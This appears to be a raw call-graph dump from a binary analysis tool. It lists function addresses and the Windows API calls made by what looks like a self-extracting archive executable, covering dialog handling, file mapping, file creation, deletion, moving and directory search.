23787 5aaf66 23786->23787 23787->23776 23788->23779 25354 5a88f0 7 API calls ___scrt_uninitialize_crt 25385 58f1e8 FreeLibrary 23818 59b7e0 23819 59b7ea __EH_prolog 23818->23819 23984 581316 23819->23984 23822 59b82a 23825 59b838 23822->23825 23826 59b89b 23822->23826 23899 59b841 23822->23899 23823 59bf0f 24056 59d69e 23823->24056 23829 59b878 23825->23829 23830 59b83c 23825->23830 23828 59b92e GetDlgItemTextW 23826->23828 23833 59b8b1 23826->23833 23828->23829 23836 59b96b 23828->23836 23837 59b95f KiUserCallbackDispatcher 23829->23837 23829->23899 23840 58e617 53 API calls 23830->23840 23830->23899 23831 59bf38 23834 59bf41 SendDlgItemMessageW 23831->23834 23835 59bf52 GetDlgItem SendMessageW 23831->23835 23832 59bf2a SendMessageW 23832->23831 23839 58e617 53 API calls 23833->23839 23834->23835 24074 59a64d GetCurrentDirectoryW 23835->24074 23838 59b980 GetDlgItem 23836->23838 23982 59b974 23836->23982 23837->23899 23843 59b994 SendMessageW SendMessageW 23838->23843 23844 59b9b7 SetFocus 23838->23844 23845 59b8ce SetDlgItemTextW 23839->23845 23846 59b85b 23840->23846 23842 59bf82 GetDlgItem 23847 59bf9f 23842->23847 23848 59bfa5 SetWindowTextW 23842->23848 23843->23844 23849 59b9c7 23844->23849 23863 59b9e0 23844->23863 23850 59b8d9 23845->23850 24096 58124f SHGetMalloc 23846->24096 23847->23848 24075 59abab GetClassNameW 23848->24075 23854 58e617 53 API calls 23849->23854 23857 59b8e6 GetMessageW 23850->23857 23850->23899 23852 59be55 23855 58e617 53 API calls 23852->23855 23858 59b9d1 23854->23858 23859 59be65 SetDlgItemTextW 23855->23859 23861 59b8fd IsDialogMessageW 23857->23861 23857->23899 24097 59d4d4 23858->24097 23865 59be79 23859->23865 23861->23850 23867 59b90c TranslateMessage DispatchMessageW 23861->23867 23868 58e617 53 API calls 23863->23868 23864 59c1fc SetDlgItemTextW 23864->23899 23870 58e617 53 API calls 23865->23870 23867->23850 23869 59ba17 23868->23869 23872 584092 _swprintf 51 API calls 23869->23872 23906 59be9c _wcslen 23870->23906 23871 59bff0 23876 59c020 23871->23876 23879 58e617 53 API calls 23871->23879 23877 59ba29 23872->23877 23873 59b9d9 23994 58a0b1 23873->23994 23875 59c73f 97 API calls 23875->23871 23880 59c73f 97 API calls 23876->23880 23914 59c0d8 23876->23914 23881 59d4d4 16 API calls 23877->23881 23885 59c003 SetDlgItemTextW 23879->23885 23887 59c03b 23880->23887 23881->23873 23882 59c18b 23888 59c19d 23882->23888 23889 59c194 EnableWindow 23882->23889 23883 59ba68 GetLastError 23884 59ba73 23883->23884 24000 59ac04 SetCurrentDirectoryW 23884->24000 23891 58e617 53 API calls 23885->23891 23900 59c04d 23887->23900 23928 59c072 23887->23928 23895 59c1ba 23888->23895 24115 5812d3 GetDlgItem EnableWindow 23888->24115 23889->23888 23890 59beed 23894 58e617 53 API calls 23890->23894 23892 59c017 SetDlgItemTextW 23891->23892 23892->23876 23893 59ba87 23897 59ba9e 23893->23897 23898 59ba90 GetLastError 23893->23898 23894->23899 23896 59c1e1 23895->23896 23911 59c1d9 SendMessageW 23895->23911 23896->23899 23913 58e617 53 API calls 23896->23913 23907 59bb20 23897->23907 23912 59baae GetTickCount 23897->23912 23957 59bb11 23897->23957 23898->23897 24113 599ed5 32 API calls 23900->24113 23901 59c0cb 23903 59c73f 97 API calls 23901->23903 23903->23914 23905 59c1b0 24116 5812d3 GetDlgItem EnableWindow 23905->24116 23906->23890 23915 58e617 53 API calls 23906->23915 23917 59bcfb 23907->23917 23918 59bb39 GetModuleFileNameW 23907->23918 23919 59bcf1 23907->23919 23908 59bd56 24016 5812f1 GetDlgItem ShowWindow 23908->24016 23909 59c066 23909->23928 23911->23896 23922 584092 _swprintf 51 API calls 23912->23922 23923 59b862 23913->23923 23914->23882 23920 59c169 23914->23920 23930 58e617 53 API calls 23914->23930 23916 59bed0 23915->23916 23924 584092 _swprintf 51 API calls 23916->23924 23927 58e617 53 API calls 23917->23927 24107 58f28c 82 API calls 23918->24107 23919->23829 23919->23917 24114 599ed5 32 API calls 23920->24114 23936 59bac7 23922->23936 23923->23864 23923->23899 23924->23890 23933 59bd05 23927->23933 23928->23901 23934 59c73f 97 API calls 23928->23934 23929 59bd66 24017 5812f1 GetDlgItem ShowWindow 23929->24017 23930->23914 23931 59bb5f 23937 584092 _swprintf 51 API calls 23931->23937 23932 59c188 23932->23882 23938 584092 _swprintf 51 API calls 23933->23938 23939 59c0a0 23934->23939 24001 58966e 23936->24001 23941 59bb81 CreateFileMappingW 23937->23941 23942 59bd23 23938->23942 23939->23901 23943 59c0a9 DialogBoxParamW 23939->23943 23940 59bd70 23944 58e617 53 API calls 23940->23944 23946 59bbe3 GetCommandLineW 23941->23946 23977 59bc60 __InternalCxxFrameHandler 23941->23977 23955 58e617 53 API calls 23942->23955 23943->23829 23943->23901 23947 59bd7a SetDlgItemTextW 23944->23947 23949 59bbf4 23946->23949 24018 5812f1 GetDlgItem ShowWindow 23947->24018 23948 59baed 23951 59baff 23948->23951 23952 59baf4 GetLastError 23948->23952 24108 59b425 SHGetMalloc 23949->24108 24009 58959a 23951->24009 23952->23951 23959 59bd3d 23955->23959 23956 59bd8c SetDlgItemTextW GetDlgItem 23960 59bda9 GetWindowLongW SetWindowLongW 23956->23960 23961 59bdc1 23956->23961 23957->23907 23957->23908 23958 59bc10 24109 59b425 SHGetMalloc 23958->24109 23960->23961 24019 59c73f 23961->24019 23965 59bc1c 24110 59b425 SHGetMalloc 23965->24110 23966 59c73f 97 API calls 23968 59bddd 23966->23968 24044 59da52 23968->24044 23969 59bc28 24111 58f3fa 82 API calls 2 library calls 23969->24111 23970 59bccb 23970->23919 23976 59bce1 UnmapViewOfFile CloseHandle 23970->23976 23974 59bc3f MapViewOfFile 23974->23977 23975 59c73f 97 API calls 23981 59be03 23975->23981 23976->23919 23977->23970 23978 59bcb7 Sleep 23977->23978 23978->23970 23978->23977 23979 59be2c 24112 5812d3 GetDlgItem EnableWindow 23979->24112 23981->23979 23983 59c73f 97 API calls 23981->23983 23982->23829 23982->23852 23983->23979 23985 581378 23984->23985 23987 58131f 23984->23987 24118 58e2c1 GetWindowLongW SetWindowLongW 23985->24118 23988 581385 23987->23988 24117 58e2e8 62 API calls 2 library calls 23987->24117 23988->23822 23988->23823 23988->23899 23990 581341 23990->23988 23991 581354 GetDlgItem 23990->23991 23991->23988 23992 581364 23991->23992 23992->23988 23993 58136a SetWindowTextW 23992->23993 23993->23988 23997 58a0bb 23994->23997 23995 58a14c 23996 58a2b2 8 API calls 23995->23996 23998 58a175 23995->23998 23996->23998 23997->23995 23997->23998 24119 58a2b2 23997->24119 23998->23883 23998->23884 24000->23893 24002 589678 24001->24002 24003 5896d5 CreateFileW 24002->24003 24004 5896c9 24002->24004 24003->24004 24005 58bb03 GetCurrentDirectoryW 24004->24005 24007 58971f 24004->24007 24006 589704 24005->24006 24006->24007 24008 589708 CreateFileW 24006->24008 24007->23948 24008->24007 24010 5895be 24009->24010 24011 5895cf 24009->24011 24010->24011 24012 5895ca 24010->24012 24013 5895d1 24010->24013 24011->23957 24140 58974e 24012->24140 24145 589620 24013->24145 24016->23929 24017->23940 24018->23956 24020 59c749 __EH_prolog 24019->24020 24021 59bdcf 24020->24021 24022 59b314 ExpandEnvironmentStringsW 24020->24022 24021->23966 24033 59c780 _wcslen _wcsrchr 24022->24033 24024 59b314 ExpandEnvironmentStringsW 24024->24033 24025 59ca67 SetWindowTextW 24025->24033 24028 5a3e3e 22 API calls 24028->24033 24030 59c855 SetFileAttributesW 24032 59c90f GetFileAttributesW 24030->24032 24043 59c86f _abort _wcslen 24030->24043 24032->24033 24035 59c921 DeleteFileW 24032->24035 24033->24021 24033->24024 24033->24025 24033->24028 24033->24030 24036 59cc31 GetDlgItem SetWindowTextW SendMessageW 24033->24036 24039 59cc71 SendMessageW 24033->24039 24160 591fbb CompareStringW 24033->24160 24161 59a64d GetCurrentDirectoryW 24033->24161 24163 58a5d1 6 API calls 24033->24163 24164 58a55a FindClose 24033->24164 24165 59b48e 76 API calls 2 library calls 24033->24165 24035->24033 24037 59c932 24035->24037 24036->24033 24038 584092 _swprintf 51 API calls 24037->24038 24040 59c952 GetFileAttributesW 24038->24040 24039->24033 24040->24037 24041 59c967 MoveFileW 24040->24041 24041->24033 24042 59c97f MoveFileExW 24041->24042 24042->24033 24043->24032 24043->24033 24162 58b991 51 API calls 3 library calls 24043->24162 24045 59da5c __EH_prolog 24044->24045 24166 590659 24045->24166 24047 59da8d 24170 585b3d 24047->24170 24049 59daab 24174 587b0d 24049->24174 24053 59dafe 24190 587b9e 24053->24190 24055 59bdee 24055->23975 24057 59d6a8 24056->24057 24665 59a5c6 24057->24665 24060 59d6b5 GetWindow 24061 59bf15 24060->24061 24062 59d6d5 24060->24062 24061->23831 24061->23832 24062->24061 24063 59d6e2 GetClassNameW 24062->24063 24065 59d76a GetWindow 24062->24065 24066 59d706 GetWindowLongW 24062->24066 24670 591fbb CompareStringW 24063->24670 24065->24061 24065->24062 24066->24065 24067 59d716 SendMessageW 24066->24067 24067->24065 24068 59d72c GetObjectW 24067->24068 24671 59a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24068->24671 24070 59d743 24672 59a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24070->24672 24673 59a80c 8 API calls 24070->24673 24073 59d754 SendMessageW DeleteObject 24073->24065 24074->23842 24076 59abcc 24075->24076 24077 59abf1 24075->24077 24676 591fbb CompareStringW 24076->24676 24079 59abff 24077->24079 24080 59abf6 SHAutoComplete 24077->24080 24083 59b093 24079->24083 24080->24079 24081 59abdf 24081->24077 24082 59abe3 FindWindowExW 24081->24082 24082->24077 24084 59b09d __EH_prolog 24083->24084 24085 5813dc 84 API calls 24084->24085 24086 59b0bf 24085->24086 24677 581fdc 24086->24677 24089 59b0d9 24091 581692 86 API calls 24089->24091 24090 59b0eb 24092 5819af 128 API calls 24090->24092 24093 59b0e4 24091->24093 24095 59b10d __InternalCxxFrameHandler ___std_exception_copy 24092->24095 24093->23871 24093->23875 24094 581692 86 API calls 24094->24093 24095->24094 24096->23923 24098 59b568 5 API calls 24097->24098 24099 59d4e0 GetDlgItem 24098->24099 24100 59d502 24099->24100 24101 59d536 SendMessageW SendMessageW 24099->24101 24106 59d50d ShowWindow SendMessageW SendMessageW 24100->24106 24102 59d591 SendMessageW SendMessageW SendMessageW 24101->24102 24103 59d572 24101->24103 24104 59d5c4 SendMessageW 24102->24104 24105 59d5e7 SendMessageW 24102->24105 24103->24102 24104->24105 24105->23873 24106->24101 24107->23931 24108->23958 24109->23965 24110->23969 24111->23974 24112->23982 24113->23909 24114->23932 24115->23905 24116->23895 24117->23990 24118->23988 24120 58a2bf 24119->24120 24121 58a2e3 24120->24121 24122 58a2d6 CreateDirectoryW 24120->24122 24123 58a231 3 API calls 24121->24123 24122->24121 24124 58a316 24122->24124 24125 58a2e9 24123->24125 24127 58a325 24124->24127 24132 58a4ed 24124->24132 24126 58a329 GetLastError 24125->24126 24128 58bb03 GetCurrentDirectoryW 24125->24128 24126->24127 24127->23997 24130 58a2ff 24128->24130 24130->24126 24131 58a303 CreateDirectoryW 24130->24131 24131->24124 24131->24126 24133 59ec50 24132->24133 24134 58a4fa SetFileAttributesW 24133->24134 24135 58a53d 24134->24135 24136 58a510 24134->24136 24135->24127 24137 58bb03 GetCurrentDirectoryW 24136->24137 24138 58a524 24137->24138 24138->24135 24139 58a528 SetFileAttributesW 24138->24139 24139->24135 24141 589781 24140->24141 24142 589757 24140->24142 24141->24011 24142->24141 24151 58a1e0 24142->24151 24146 58962c 24145->24146 24148 58964a 24145->24148 24146->24148 24149 589638 CloseHandle 24146->24149 24147 589669 24147->24011 24148->24147 24159 586bd5 76 API calls 24148->24159 24149->24148 24152 59ec50 24151->24152 24153 58a1ed DeleteFileW 24152->24153 24154 58977f 24153->24154 24155 58a200 24153->24155 24154->24011 24156 58bb03 GetCurrentDirectoryW 24155->24156 24157 58a214 24156->24157 24157->24154 24158 58a218 DeleteFileW 24157->24158 24158->24154 24159->24147 24160->24033 24161->24033 24162->24043 24163->24033 24164->24033 24165->24033 24167 590666 _wcslen 24166->24167 24194 5817e9 24167->24194 24169 59067e 24169->24047 24171 590659 _wcslen 24170->24171 24172 5817e9 78 API calls 24171->24172 24173 59067e 24172->24173 24173->24049 24175 587b17 __EH_prolog 24174->24175 24211 58ce40 24175->24211 24177 587b32 24217 59eb38 24177->24217 24179 587b5c 24226 594a76 24179->24226 24182 587c7d 24183 587c87 24182->24183 24185 587cf1 24183->24185 24258 58a56d 24183->24258 24187 587d50 24185->24187 24236 588284 24185->24236 24186 587d92 24186->24053 24187->24186 24264 58138b 74 API calls 24187->24264 24191 587bac 24190->24191 24193 587bb3 24190->24193 24192 592297 86 API calls 24191->24192 24192->24193 24195 5817ff 24194->24195 24196 58185a __InternalCxxFrameHandler 24194->24196 24197 581828 24195->24197 24207 586c36 76 API calls __vswprintf_c_l 24195->24207 24196->24169 24199 581887 24197->24199 24204 581847 ___std_exception_copy 24197->24204 24201 5a3e3e 22 API calls 24199->24201 24200 58181e 24208 586ca7 75 API calls 24200->24208 24203 58188e 24201->24203 24203->24196 24210 586ca7 75 API calls 24203->24210 24204->24196 24209 586ca7 75 API calls 24204->24209 24207->24200 24208->24197 24209->24196 24210->24196 24212 58ce4a __EH_prolog 24211->24212 24213 59eb38 8 API calls 24212->24213 24214 58ce8d 24213->24214 24215 59eb38 8 API calls 24214->24215 24216 58ceb1 24215->24216 24216->24177 24218 59eb3d ___std_exception_copy 24217->24218 24219 59eb57 24218->24219 24222 59eb59 24218->24222 24232 5a7a5e 7 API calls 2 library calls 24218->24232 24219->24179 24221 59f5c9 24234 5a238d RaiseException 24221->24234 24222->24221 24233 5a238d RaiseException 24222->24233 24225 59f5e6 24227 594a80 __EH_prolog 24226->24227 24228 59eb38 8 API calls 24227->24228 24229 594a9c 24228->24229 24230 587b8b 24229->24230 24235 590e46 80 API calls 24229->24235 24230->24182 24232->24218 24233->24221 24234->24225 24235->24230 24237 58828e __EH_prolog 24236->24237 24265 5813dc 24237->24265 24239 5882aa 24240 5882bb 24239->24240 24408 589f42 24239->24408 24243 5882f2 24240->24243 24273 581a04 24240->24273 24404 581692 24243->24404 24246 588389 24292 588430 24246->24292 24249 5883e8 24300 581f6d 24249->24300 24252 5882ee 24252->24243 24252->24246 24256 58a56d 7 API calls 24252->24256 24412 58c0c5 CompareStringW _wcslen 24252->24412 24254 5883f3 24254->24243 24304 583b2d 24254->24304 24316 58848e 24254->24316 24256->24252 24259 58a582 24258->24259 24260 58a5b0 24259->24260 24654 58a69b 24259->24654 24260->24183 24262 58a592 24262->24260 24263 58a597 FindClose 24262->24263 24263->24260 24264->24186 24266 5813e1 __EH_prolog 24265->24266 24267 58ce40 8 API calls 24266->24267 24268 581419 24267->24268 24269 59eb38 8 API calls 24268->24269 24272 581474 _abort 24268->24272 24270 581461 24269->24270 24271 58b505 84 API calls 24270->24271 24270->24272 24271->24272 24272->24239 24274 581a0e __EH_prolog 24273->24274 24285 581b9b 24274->24285 24287 581a61 24274->24287 24413 5813ba 24274->24413 24277 581bc7 24416 58138b 74 API calls 24277->24416 24279 583b2d 101 API calls 24282 581c12 24279->24282 24280 581bd4 24280->24279 24280->24285 24281 581c5a 24281->24285 24286 581c8d 24281->24286 24417 58138b 74 API calls 24281->24417 24282->24281 24284 583b2d 101 API calls 24282->24284 24284->24282 24285->24252 24286->24285 24290 589e80 79 API calls 24286->24290 24287->24277 24287->24280 24287->24285 24288 583b2d 101 API calls 24289 581cde 24288->24289 24289->24285 24289->24288 24290->24289 24291 589e80 79 API calls 24291->24287 24435 58cf3d 24292->24435 24294 588440 24439 5913d2 GetSystemTime SystemTimeToFileTime 24294->24439 24296 5883a3 24296->24249 24297 591b66 24296->24297 24440 59de6b 24297->24440 24301 581f72 __EH_prolog 24300->24301 24303 581fa6 24301->24303 24448 5819af 24301->24448 24303->24254 24305 583b39 24304->24305 24306 583b3d 24304->24306 24305->24254 24315 589e80 79 API calls 24306->24315 24307 583b4f 24308 583b78 24307->24308 24309 583b6a 24307->24309 24581 58286b 101 API calls 3 library calls 24308->24581 24310 583baa 24309->24310 24580 5832f7 89 API calls 2 library calls 24309->24580 24310->24254 24313 583b76 24313->24310 24582 5820d7 74 API calls 24313->24582 24315->24307 24317 588498 __EH_prolog 24316->24317 24320 5884d5 24317->24320 24327 588513 24317->24327 24607 598c8d 103 API calls 24317->24607 24319 5884f5 24321 5884fa 24319->24321 24322 58851c 24319->24322 24320->24319 24325 58857a 24320->24325 24320->24327 24321->24327 24608 587a0d 152 API calls 24321->24608 24322->24327 24609 598c8d 103 API calls 24322->24609 24325->24327 24583 585d1a 24325->24583 24327->24254 24328 588605 24328->24327 24589 588167 24328->24589 24331 588797 24332 58a56d 7 API calls 24331->24332 24336 588802 24331->24336 24332->24336 24334 58d051 82 API calls 24335 58885d 24334->24335 24335->24327 24335->24334 24337 58898b 24335->24337 24341 588992 24335->24341 24610 588117 84 API calls 24335->24610 24611 582021 74 API calls 24335->24611 24595 587c0d 24336->24595 24612 582021 74 API calls 24337->24612 24338 588a5f 24342 588ab6 24338->24342 24355 588a6a 24338->24355 24341->24338 24343 5889e1 24341->24343 24350 588a4c 24342->24350 24615 587fc0 97 API calls 24342->24615 24347 58a231 3 API calls 24343->24347 24343->24350 24352 588b14 24343->24352 24344 589105 24349 58959a 80 API calls 24344->24349 24345 588ab4 24346 58959a 80 API calls 24345->24346 24346->24327 24351 588a19 24347->24351 24349->24327 24350->24345 24350->24352 24351->24350 24613 5892a3 97 API calls 24351->24613 24352->24344 24364 588b82 24352->24364 24616 5898bc 24352->24616 24353 58ab1a 8 API calls 24356 588bd1 24353->24356 24355->24345 24614 587db2 101 API calls 24355->24614 24359 58ab1a 8 API calls 24356->24359 24373 588be7 24359->24373 24362 588b70 24620 586e98 77 API calls 24362->24620 24364->24353 24365 588cbc 24366 588d18 24365->24366 24367 588e40 24365->24367 24368 588d8a 24366->24368 24369 588d28 24366->24369 24370 588e52 24367->24370 24371 588e66 24367->24371 24390 588d49 24367->24390 24378 588167 19 API calls 24368->24378 24374 588d6e 24369->24374 24382 588d37 24369->24382 24375 589215 123 API calls 24370->24375 24372 593377 75 API calls 24371->24372 24376 588e7f 24372->24376 24373->24365 24377 588c93 24373->24377 24384 58981a 79 API calls 24373->24384 24374->24390 24623 5877b8 111 API calls 24374->24623 24375->24390 24626 593020 123 API calls 24376->24626 24377->24365 24621 589a3c 82 API calls 24377->24621 24381 588dbd 24378->24381 24386 588df5 24381->24386 24387 588de6 24381->24387 24381->24390 24622 582021 74 API calls 24382->24622 24384->24377 24625 589155 93 API calls __EH_prolog 24386->24625 24624 587542 85 API calls 24387->24624 24393 588f85 24390->24393 24627 582021 74 API calls 24390->24627 24392 589090 24392->24344 24394 58a4ed 3 API calls 24392->24394 24393->24344 24393->24392 24395 58903e 24393->24395 24601 589f09 SetEndOfFile 24393->24601 24396 5890eb 24394->24396 24602 589da2 24395->24602 24396->24344 24628 582021 74 API calls 24396->24628 24399 589085 24401 589620 77 API calls 24399->24401 24401->24392 24402 5890fb 24629 586dcb 76 API calls _wcschr 24402->24629 24405 5816a4 24404->24405 24645 58cee1 24405->24645 24409 589f59 24408->24409 24410 589f63 24409->24410 24653 586d0c 78 API calls 24409->24653 24410->24240 24412->24252 24418 581732 24413->24418 24415 5813d6 24415->24291 24416->24285 24417->24286 24419 581748 24418->24419 24430 5817a0 __InternalCxxFrameHandler 24418->24430 24420 581771 24419->24420 24431 586c36 76 API calls __vswprintf_c_l 24419->24431 24421 5817c7 24420->24421 24427 58178d ___std_exception_copy 24420->24427 24424 5a3e3e 22 API calls 24421->24424 24423 581767 24432 586ca7 75 API calls 24423->24432 24425 5817ce 24424->24425 24425->24430 24434 586ca7 75 API calls 24425->24434 24427->24430 24433 586ca7 75 API calls 24427->24433 24430->24415 24431->24423 24432->24420 24433->24430 24434->24430 24436 58cf4d 24435->24436 24438 58cf54 24435->24438 24437 58981a 79 API calls 24436->24437 24437->24438 24438->24294 24439->24296 24441 59de78 24440->24441 24442 58e617 53 API calls 24441->24442 24443 59de9b 24442->24443 24444 584092 _swprintf 51 API calls 24443->24444 24445 59dead 24444->24445 24446 59d4d4 16 API calls 24445->24446 24447 591b7c 24446->24447 24447->24249 24449 5819bf 24448->24449 24452 5819bb 24448->24452 24453 589e80 79 API calls 24449->24453 24450 5819d4 24454 5818f6 24450->24454 24452->24303 24453->24450 24455 581908 24454->24455 24456 581945 24454->24456 24457 583b2d 101 API calls 24455->24457 24462 583fa3 24456->24462 24460 581928 24457->24460 24460->24452 24466 583fac 24462->24466 24463 583b2d 101 API calls 24463->24466 24464 581966 24464->24460 24467 581e50 24464->24467 24466->24463 24466->24464 24479 590e08 24466->24479 24468 581e5a __EH_prolog 24467->24468 24487 583bba 24468->24487 24470 581e84 24471 581732 78 API calls 24470->24471 24478 581f0b 24470->24478 24472 581e9b 24471->24472 24515 5818a9 78 API calls 24472->24515 24474 581eb3 24476 581ebf _wcslen 24474->24476 24516 591b84 MultiByteToWideChar 24474->24516 24517 5818a9 78 API calls 24476->24517 24478->24460 24480 590e0f 24479->24480 24481 590e2a 24480->24481 24485 586c31 RaiseException CallUnexpected 24480->24485 24483 590e3b SetThreadExecutionState 24481->24483 24486 586c31 RaiseException CallUnexpected 24481->24486 24483->24466 24485->24481 24486->24483 24488 583bc4 __EH_prolog 24487->24488 24489 583bda 24488->24489 24490 583bf6 24488->24490 24543 58138b 74 API calls 24489->24543 24491 583e51 24490->24491 24495 583c22 24490->24495 24560 58138b 74 API calls 24491->24560 24494 583be5 24494->24470 24495->24494 24518 593377 24495->24518 24497 583ca3 24499 583d2e 24497->24499 24514 583c9a 24497->24514 24546 58d051 24497->24546 24498 583c9f 24498->24497 24545 5820bd 78 API calls 24498->24545 24528 58ab1a 24499->24528 24501 583c8f 24544 58138b 74 API calls 24501->24544 24502 583c71 24502->24497 24502->24498 24502->24501 24503 583d41 24508 583dd7 24503->24508 24509 583dc7 24503->24509 24552 593020 123 API calls 24508->24552 24532 589215 24509->24532 24512 583dd5 24512->24514 24553 582021 74 API calls 24512->24553 24554 592297 24514->24554 24515->24474 24516->24476 24517->24478 24519 59338c 24518->24519 24521 593396 ___std_exception_copy 24518->24521 24561 586ca7 75 API calls 24519->24561 24522 59341c 24521->24522 24523 5934c6 24521->24523 24527 593440 _abort 24521->24527 24562 5932aa 75 API calls 3 library calls 24522->24562 24563 5a238d RaiseException 24523->24563 24526 5934f2 24527->24502 24529 58ab28 24528->24529 24531 58ab32 24528->24531 24530 59eb38 8 API calls 24529->24530 24530->24531 24531->24503 24533 58921f __EH_prolog 24532->24533 24564 587c64 24533->24564 24536 5813ba 78 API calls 24537 589231 24536->24537 24567 58d114 24537->24567 24539 58928a 24539->24512 24540 589243 24540->24539 24542 58d114 118 API calls 24540->24542 24576 58d300 97 API calls __InternalCxxFrameHandler 24540->24576 24542->24540 24543->24494 24544->24514 24545->24497 24547 58d072 24546->24547 24548 58d084 24546->24548 24577 58603a 82 API calls 24547->24577 24578 58603a 82 API calls 24548->24578 24551 58d07c 24551->24499 24552->24512 24553->24514 24556 5922a1 24554->24556 24555 5922ba 24579 590eed 86 API calls 24555->24579 24556->24555 24559 5922ce 24556->24559 24558 5922c1 24558->24559 24560->24494 24561->24521 24562->24527 24563->24526 24565 58b146 GetVersionExW 24564->24565 24566 587c69 24565->24566 24566->24536 24573 58d12a __InternalCxxFrameHandler 24567->24573 24568 58d29a 24569 58d2ce 24568->24569 24570 58d0cb 6 API calls 24568->24570 24571 590e08 SetThreadExecutionState RaiseException 24569->24571 24570->24569 24574 58d291 24571->24574 24572 598c8d 103 API calls 24572->24573 24573->24568 24573->24572 24573->24574 24575 58ac05 91 API calls 24573->24575 24574->24540 24575->24573 24576->24540 24577->24551 24578->24551 24579->24558 24580->24313 24581->24313 24582->24310 24584 585d2a 24583->24584 24630 585c4b 24584->24630 24587 585d5d 24588 585d95 24587->24588 24635 58b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24587->24635 24588->24328 24590 588186 24589->24590 24591 588232 24590->24591 24642 58be5e 19 API calls __InternalCxxFrameHandler 24590->24642 24641 591fac CharUpperW 24591->24641 24594 58823b 24594->24331 24596 587c22 24595->24596 24597 587c5a 24596->24597 24643 586e7a 74 API calls 24596->24643 24597->24335 24599 587c52 24644 58138b 74 API calls 24599->24644 24601->24395 24603 589db3 24602->24603 24606 589dc2 24602->24606 24604 589db9 FlushFileBuffers 24603->24604 24603->24606 24604->24606 24605 589e3f SetFileTime 24605->24399 24606->24605 24607->24320 24608->24327 24609->24327 24610->24335 24611->24335 24612->24341 24613->24350 24614->24345 24615->24350 24617 588b5a 24616->24617 24618 5898c5 GetFileType 24616->24618 24617->24364 24619 582021 74 API calls 24617->24619 24618->24617 24619->24362 24620->24364 24621->24365 24622->24390 24623->24390 24624->24390 24625->24390 24626->24390 24627->24393 24628->24402 24629->24344 24636 585b48 24630->24636 24632 585c6c 24632->24587 24634 585b48 2 API calls 24634->24632 24635->24587 24638 585b52 24636->24638 24637 585c3a 24637->24632 24637->24634 24638->24637 24640 58b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24638->24640 24640->24638 24641->24594 24642->24591 24643->24599 24644->24597 24646 58cef2 24645->24646 24651 58a99e 86 API calls 24646->24651 24648 58cf24 24652 58a99e 86 API calls 24648->24652 24650 58cf2f 24651->24648 24652->24650 24653->24410 24655 58a6a8 24654->24655 24656 58a6c1 FindFirstFileW 24655->24656 24657 58a727 FindNextFileW 24655->24657 24658 58a6d0 24656->24658 24664 58a709 24656->24664 24659 58a732 GetLastError 24657->24659 24657->24664 24660 58bb03 GetCurrentDirectoryW 24658->24660 24659->24664 24661 58a6e0 24660->24661 24662 58a6fe GetLastError 24661->24662 24663 58a6e4 FindFirstFileW 24661->24663 24662->24664 24663->24662 24663->24664 24664->24262 24674 59a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24665->24674 24667 59a5cd 24669 59a5d9 24667->24669 24675 59a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24667->24675 24669->24060 24669->24061 24670->24062 24671->24070 24672->24070 24673->24073 24674->24667 24675->24669 24676->24081 24678 589f42 78 API calls 24677->24678 24679 581fe8 24678->24679 24680 581a04 101 API calls 24679->24680 24683 582005 24679->24683 24681 581ff5 24680->24681 24681->24683 24684 58138b 74 API calls 24681->24684 24683->24089 24683->24090 24684->24683 24685 5813e1 84 API calls 2 library calls 25356 5994e0 GetClientRect 25386 5921e0 26 API calls std::bad_exception::bad_exception 25406 59f2e0 46 API calls __RTC_Initialize 25407 5abee0 GetCommandLineA GetCommandLineW 24687 59eae7 24688 59eaf1 24687->24688 24689 59e85d ___delayLoadHelper2@8 14 API calls 24688->24689 24690 59eafe 24689->24690 25357 59f4e7 29 API calls _abort 25358 5ab49d 6 API calls _ValidateLocalCookies 25360 59c793 97 API calls 4 library calls 25388 59b18d 78 API calls 25389 599580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25408 59c793 102 API calls 5 library calls 25428 591bbd GetCPInfo IsDBCSLeadByte 25390 59b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24837 59f3b2 24838 59f3be ___scrt_is_nonwritable_in_current_image 24837->24838 24869 59eed7 24838->24869 24840 59f3c5 24841 59f518 24840->24841 24844 59f3ef 24840->24844 24942 59f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24841->24942 24843 59f51f 24935 5a7f58 24843->24935 24855 59f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24844->24855 24880 5a8aed 24844->24880 24851 59f40e 24853 59f48f 24888 59f953 GetStartupInfoW _abort 24853->24888 24855->24853 24938 5a7af4 38 API calls 2 library calls 24855->24938 24856 59f495 24889 5a8a3e 51 API calls 24856->24889 24859 59f49d 24890 59df1e 24859->24890 24863 59f4b1 24863->24843 24864 59f4b5 24863->24864 24865 59f4be 24864->24865 24940 5a7efb 28 API calls _abort 24864->24940 24941 59f048 12 API calls ___scrt_uninitialize_crt 24865->24941 24868 59f4c6 24868->24851 24870 59eee0 24869->24870 24944 59f654 IsProcessorFeaturePresent 24870->24944 24872 59eeec 24945 5a2a5e 24872->24945 24874 59eef1 24875 59eef5 24874->24875 24953 5a8977 24874->24953 24875->24840 24878 59ef0c 24878->24840 24882 5a8b04 24880->24882 24881 59fbbc _ValidateLocalCookies 5 API calls 24883 59f408 24881->24883 24882->24881 24883->24851 24884 5a8a91 24883->24884 24887 5a8ac0 24884->24887 24885 59fbbc _ValidateLocalCookies 5 API calls 24886 5a8ae9 24885->24886 24886->24855 24887->24885 24888->24856 24889->24859 25046 590863 24890->25046 24894 59df3d 25095 59ac16 24894->25095 24896 59df46 _abort 24897 59df59 GetCommandLineW 24896->24897 24898 59df68 24897->24898 24899 59dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24897->24899 25099 59c5c4 24898->25099 24900 584092 _swprintf 51 API calls 24899->24900 24902 59e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24900->24902 25110 59b6dd LoadBitmapW 24902->25110 24905 59dfe0 25104 59dbde 24905->25104 24906 59df76 OpenFileMappingW 24908 59df8f MapViewOfFile 24906->24908 24909 59dfd6 CloseHandle 24906->24909 24912 59dfcd UnmapViewOfFile 24908->24912 24913 59dfa0 __InternalCxxFrameHandler 24908->24913 24909->24899 24912->24909 